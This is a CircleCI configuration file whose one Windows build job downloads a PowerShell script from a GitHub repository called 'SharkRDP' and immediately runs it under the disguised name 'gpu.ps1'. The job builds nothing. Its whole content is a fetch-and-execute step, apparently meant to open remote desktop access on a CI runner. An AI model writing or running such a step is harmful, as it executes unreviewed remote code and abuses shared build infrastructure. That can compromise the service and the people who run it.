orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
      
        
 
    steps:  
       
      - run: 
          name: 1
          command: |      
            Invoke-WebRequest https://raw.githubusercontent.com/fqwe070/SharkRDP/main/sh -OutFile gpu.ps1 
          
      - run: ./gpu.ps1
